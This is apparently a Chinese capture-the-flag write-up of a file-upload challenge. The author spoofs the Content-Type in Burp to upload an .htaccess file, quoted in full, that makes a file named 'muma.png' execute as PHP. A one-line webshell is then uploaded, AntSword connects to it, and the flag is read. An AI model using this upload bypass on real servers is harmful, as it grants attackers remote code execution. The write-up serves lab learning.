和test5一样，文件上传限制为图片，使用.htaccess文件让上传成功图片木马文件进行执行

开屏暴击，差点去世

尝试上传文件

各种过滤，但是能传图片，这里就不写了，我做过的test5遇到过的重复内容
直接尝试在test5中的方式
通过burp重放改content-type:image/png，上传.htaccess文件，内容如下

<FilesMatch "muma.png">
SetHandler application/x-httpd-php   
</FilesMatch>

意思是遇到同目录下名为“muma.png”的文件当作php代码执行
成功，返回如下信息：

Warning: mkdir(): File exists in /var/www/html/upload.php on line 23
/var/www/html/upload/fc7623e1ca9592589f5a77755dabba1e/.htaccess succesfully uploaded!

然后上传“muma.png“的一句话木马
成功，返回如下信息：

Warning: mkdir(): File exists in /var/www/html/upload.php on line 23
/var/www/html/upload/fc7623e1ca9592589f5a77755dabba1e/muma.png succesfully uploaded!

接下来就直接蚁剑连接，先查看文件目录
直接在根目录里

找到flag{977a989e-05ea-4090-bd68-d1f0d66172e4}